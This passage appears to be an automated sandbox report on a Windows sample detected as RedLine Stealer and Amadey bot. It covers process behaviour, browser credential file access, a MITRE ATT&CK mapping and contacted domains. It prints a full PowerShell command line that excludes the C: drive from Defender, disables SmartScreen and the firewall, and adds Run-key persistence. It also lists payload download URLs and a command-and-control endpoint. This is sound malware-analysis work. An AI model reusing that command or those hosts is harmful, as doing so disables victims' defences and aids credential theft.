      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00C8FCF9 cpuid 19_2_00C8FCF9
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeCode function: 19_2_00C8C0A0 Sleep,Sleep,GetUserNameW,19_2_00C8C0A0

      Lowering of HIPS / PFW / Operating System Security Settings:

      barindex
      Uses netsh to modify the Windows network and firewall settingsShow sources
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      Modifies the windows firewallShow sources
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
      Source: We7WnoqeXe.exe, 00000001.00000002.386808844.0000000001913000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

      Stealing of Sensitive Information:

      barindex
      Yara detected RedLine StealerShow sources
      Source: Yara matchFile source: Process Memory Space: We7WnoqeXe.exe PID: 2548, type: MEMORYSTR
      Yara detected Amadey botShow sources
      Source: Yara matchFile source: dump.pcap, type: PCAP
      Source: Yara matchFile source: 00000013.00000002.567557451.000000000167A000.00000004.00000020.sdmp, type: MEMORY
      Tries to harvest and steal browser information (history, passwords, etc)Show sources
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

      Remote Access Functionality:

      barindex
      Yara detected RedLine StealerShow sources
      Source: Yara matchFile source: Process Memory Space: We7WnoqeXe.exe PID: 2548, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation221Startup Items1Startup Items1Disable or Modify Tools311OS Credential Dumping1Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsCommand and Scripting Interpreter1Windows Service1Exploitation for Privilege Escalation1Obfuscated Files or Information2Input Capture1File and Directory Discovery2Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsScheduled Task/Job1Scheduled Task/Job1Windows Service1Software Packing12Security Account ManagerSystem Information Discovery134SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Registry Run Keys / Startup Folder221Process Injection12Timestomp1NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptScheduled Task/Job1File Deletion1LSA SecretsSecurity Software Discovery761SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol14Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder221Masquerading111Cached Domain CredentialsProcess Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsModify Registry1DCSyncVirtualization/Sandbox Evasion561Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion561Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection12/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 519882 Sample: We7WnoqeXe Startdate: 11/11/2021 Architecture: WINDOWS Score: 100 119 iplogger.org 2->119 121 bitbucket.org 2->121 143 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->143 145 Multi AV Scanner detection for dropped file 2->145 147 Multi AV Scanner detection for submitted file 2->147 149 7 other signatures 2->149 13 We7WnoqeXe.exe 15 8 2->13         started        18 System.exe 2->18         started        20 rnyuf.exe 2->20         started        signatures3 process4 dnsIp5 135 185.215.113.111, 49762, 59111 WHOLESALECONNECTIONSNL Portugal 13->135 137 cdn.discordapp.com 162.159.129.233, 443, 49765, 49770 CLOUDFLARENETUS United States 13->137 113 C:\Users\user\AppData\Local\Temp\vms.exe, PE32 13->113 dropped 115 C:\Users\user\AppData\Local\Temp\slhost.exe, PE32+ 13->115 dropped 117 C:\Users\user\AppData\...\We7WnoqeXe.exe.log, ASCII 13->117 dropped 187 Detected unpacking (changes PE section rights) 13->187 189 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->189 191 Query firmware table information (likely to detect VMs) 13->191 203 3 other signatures 13->203 22 vms.exe 4 13->22         started        26 slhost.exe 34 13->26         started        139 iplogger.org 18->139 141 bitbucket.org 18->141 193 May check the online IP address of the machine 18->193 195 Machine Learning detection for dropped file 18->195 197 Adds a directory exclusion to Windows Defender 18->197 29 powershell.exe 18->29         started        31 cmd.exe 18->31         started        33 conhost.exe 18->33         started        35 cmd.exe 18->35         started        199 Hides threads from debuggers 20->199 201 Tries to detect sandboxes / dynamic malware analysis system (registry check) 20->201 file6 signatures7 process8 dnsIp9 97 C:\Users\user\AppData\Local\...\rnyuf.exe, PE32 22->97 dropped 151 Query firmware table information (likely to detect VMs) 22->151 153 Machine Learning detection for dropped file 22->153 155 Hides threads from debuggers 22->155 157 Tries to detect sandboxes / dynamic malware analysis system (registry check) 22->157 37 rnyuf.exe 1 22 22->37         started        129 iplogger.org 88.99.66.31, 443, 49782, 49783 HETZNER-ASDE Germany 26->129 131 bitbucket.org 104.192.141.1, 443, 49774, 49785 AMAZON-02US United States 26->131 133 3 other IPs or domains 26->133 99 C:\ProgramData\UpSys.exe, PE32+ 26->99 dropped 101 C:\ProgramData\MicrosoftNetwork\System.exe, PE32+ 26->101 dropped 103 C:\Users\user\AppData\Local\...\UpSys[1].exe, PE32+ 26->103 dropped 159 May check the online IP address of the machine 26->159 161 Modifies the windows firewall 26->161 163 Adds a directory exclusion to Windows Defender 26->163 42 powershell.exe 26->42         started        44 cmd.exe 26->44         started        46 cmd.exe 26->46         started        56 23 other processes 26->56 48 UpSys.exe 29->48         started        50 conhost.exe 29->50         started        52 netsh.exe 29->52         started        54 conhost.exe 31->54         started        file10 signatures11 process12 dnsIp13 123 depressionk1d.ug 178.208.83.45, 49790, 49791, 49793 VDSINA-ASRU Russian Federation 37->123 125 162.159.135.233, 443, 49792, 49794 CLOUDFLARENETUS United States 37->125 127 2 other IPs or domains 37->127 105 C:\Users\user\AppData\Local\Temp\...\vms.exe, PE32 37->105 dropped 107 C:\Users\user\AppData\Local\...\slhost.exe, PE32+ 37->107 dropped 109 C:\Users\user\AppData\Local\...\vms[1].exe, PE32 37->109 dropped 111 2 other malicious files 37->111 dropped 165 Query firmware table information (likely to detect VMs) 37->165 167 Machine Learning detection for dropped file 37->167 169 Creates multiple autostart registry keys 37->169 173 3 other signatures 37->173 58 vms.exe 37->58         started        61 cmd.exe 37->61         started        63 schtasks.exe 37->63         started        171 Uses netsh to modify the Windows network and firewall settings 42->171 65 UpSys.exe 42->65         started        69 2 other processes 42->69 71 2 other processes 44->71 73 2 other processes 46->73 67 UpSys.exe 48->67         started        75 30 other processes 56->75 file14 signatures15 process16 signatures17 175 Multi AV Scanner detection for dropped file 58->175 177 Query firmware table information (likely to detect VMs) 58->177 179 Tries to detect sandboxes and other dynamic analysis tools (window names) 58->179 181 3 other signatures 58->181 77 reg.exe 61->77         started        80 conhost.exe 61->80         started        82 conhost.exe 63->82         started        84 UpSys.exe 65->84         started        86 conhost.exe 71->86         started        88 taskkill.exe 71->88         started        process18 signatures19 185 Creates an undocumented autostart registry key 77->185 90 UpSys.exe 84->90         started        process20 process21 92 powershell.exe 90->92         started        signatures22 183 Creates files in the system32 config directory 92->183 95 conhost.exe 92->95         started        process23

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      We7WnoqeXe.exe57%ReversingLabsWin32.Trojan.GenCBL

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\slhost.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe100%Joe Sandbox ML
      C:\ProgramData\MicrosoftNetwork\System.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\vms[1].exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\vms\vms.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\vms.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\slhost\slhost.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\slhost[1].exe100%Joe Sandbox ML
      C:\ProgramData\UpSys.exe0%MetadefenderBrowse
      C:\ProgramData\UpSys.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\vms[1].exe50%ReversingLabsWin32.Trojan.Phonzy
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\UpSys[1].exe0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\UpSys[1].exe0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\vms\vms.exe50%ReversingLabsWin32.Trojan.Phonzy

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://tempuri.org/Entity/Id22Response(V0%Avira URL Cloudsafe
      http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
      http://tempuri.org/0%URL Reputationsafe
      http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
      http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
      http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
      https://api.ip.sb/ip0%URL Reputationsafe
      http://tempuri.org/Entity/Id4(V0%Avira URL Cloudsafe
      http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
      http://depressionk1d.ug/k8FppT/index.php?scr=14C0%Avira URL Cloudsafe
      http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
      http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
      http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
      https://cdn.discordapp.com40%URL Reputationsafe
      http://depressionk1d.ug/k8FppT/index.phponProgramFiles(x86)%0%Avira URL Cloudsafe
      http://depressionk1d.ug/k8FppT/index.php?scr=1u0%Avira URL Cloudsafe
      http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
      http://depressionk1d.ug/k8FppT/index.php0%Avira URL Cloudsafe
      http://tempuri.org/Entity/Id22Response0%URL Reputationsafe
      http://depressionk1d.ug/0E8EE1B8DFF231005E9DC5D8267227684D07A380%Avira URL Cloudsafe
      http://tempuri.org/Entity/Id18Response0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      s3-w.us-east-1.amazonaws.com
      52.216.1.8
      truefalse
        high
        bitbucket.org
        104.192.141.1
        truefalse
          high
          cdn.discordapp.com
          162.159.129.233
          truefalse
            high
            iplogger.org
            88.99.66.31
            truefalse
              high
              depressionk1d.ug
              178.208.83.45
              truefalse
                high
                bbuseruploads.s3.amazonaws.com
                unknown
                unknownfalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exefalse
                    high
                    https://bitbucket.org/tilttilttilt/test1/downloads/CPU.zipfalse
                      high
                      http://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exefalse
                        high
                        http://iplogger.org/1fEwd7false
                          high
                          https://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exefalse
                            high
                            http://depressionk1d.ug/k8FppT/index.phptrue
                            • Avira URL Cloud: safe
                            unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/02/sc/sctWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabWe7WnoqeXe.exe, 00000001.00000002.391414496.000000000409C000.00000004.00000001.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=We7WnoqeXe.exe, 00000001.00000002.391414496.000000000409C000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.395032158.00000000052A8000.00000004.00000001.sdmpfalse
                                      high
                                      http://tempuri.org/Entity/Id22Response(VWe7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://tempuri.org/Entity/Id12ResponseWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://tempuri.org/We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://tempuri.org/Entity/Id2ResponseWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://bitbucket.org/tilttilttilt/test1/downloads/CPU.zipPDSystem.exe, 00000021.00000002.560744277.0000027F95B64000.00000004.00000020.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                          high
                                          http://tempuri.org/Entity/Id21ResponseWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                            high
                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                              high
                                              https://bitbucket.org/tilttilttilt/test1/downloads/UpSys.exe=GSystem.exe, 00000021.00000000.529682352.0000027F95A6B000.00000004.00000020.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceWe7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/faultWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2004/10/wsatWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://tempuri.org/Entity/Id15ResponseWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://api.ip.sb/ipWe7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://tempuri.org/Entity/Id4(VWe7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exePcrnyuf.exe, 00000013.00000003.453887701.0000000001707000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=We7WnoqeXe.exe, 00000001.00000002.391414496.000000000409C000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.395032158.00000000052A8000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://tempuri.org/Entity/Id24ResponseWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmp, We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedWe7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingWe7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://depressionk1d.ug/k8FppT/index.php?scr=14Crnyuf.exe, 00000013.00000002.567773816.00000000016DC000.00000004.00000020.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://tempuri.org/Entity/Id5ResponseWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsWe7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://tempuri.org/Entity/Id10ResponseWe7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RenewWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://tempuri.org/Entity/Id8ResponseWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://iplogger.org/1fEwd7Zslhost.exe, 0000000F.00000002.550298886.000002B9A4DDA000.00000004.00000020.sdmpfalse
                                                                                            high
                                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2006/02/addressingidentityWe7WnoqeXe.exe, 00000001.00000002.388766609.0000000003D72000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://bbuseruploads.s3.amazonaws.com/e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/7737de24-30d9-System.exe, 00000021.00000002.560744277.0000027F95B64000.00000004.00000020.sdmp, System.exe, 00000021.00000000.519263037.0000027F95BA6000.00000004.00000020.sdmp, System.exe, 00000021.00000000.529682352.0000027F95A6B000.00000004.00000020.sdmpfalse
                                                                                                    high
                                                                                                    http://iplogger.org/1fEwd7Nslhost.exe, 0000000F.00000002.550298886.000002B9A4DDA000.00000004.00000020.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://cdn.discordapp.com/rnyuf.exe, 00000013.00000003.470176267.0000000001707000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exeT_rnyuf.exe, 00000013.00000002.569193502.0000000004D00000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exe84/vms.exrnyuf.exe, 00000013.00000003.470128556.00000000016FA000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://cdn.discordapp.com4We7WnoqeXe.exe, 00000001.00000002.391049909.0000000003FDE000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/06/addressingexWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseWe7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://depressionk1d.ug/k8FppT/index.phponProgramFiles(x86)%rnyuf.exe, 00000013.00000002.569308596.0000000004D23000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://cdn.discordapp.comWe7WnoqeXe.exe, 00000001.00000002.390842824.0000000003FAB000.00000004.00000001.sdmpfalse
                                                                                                                            high
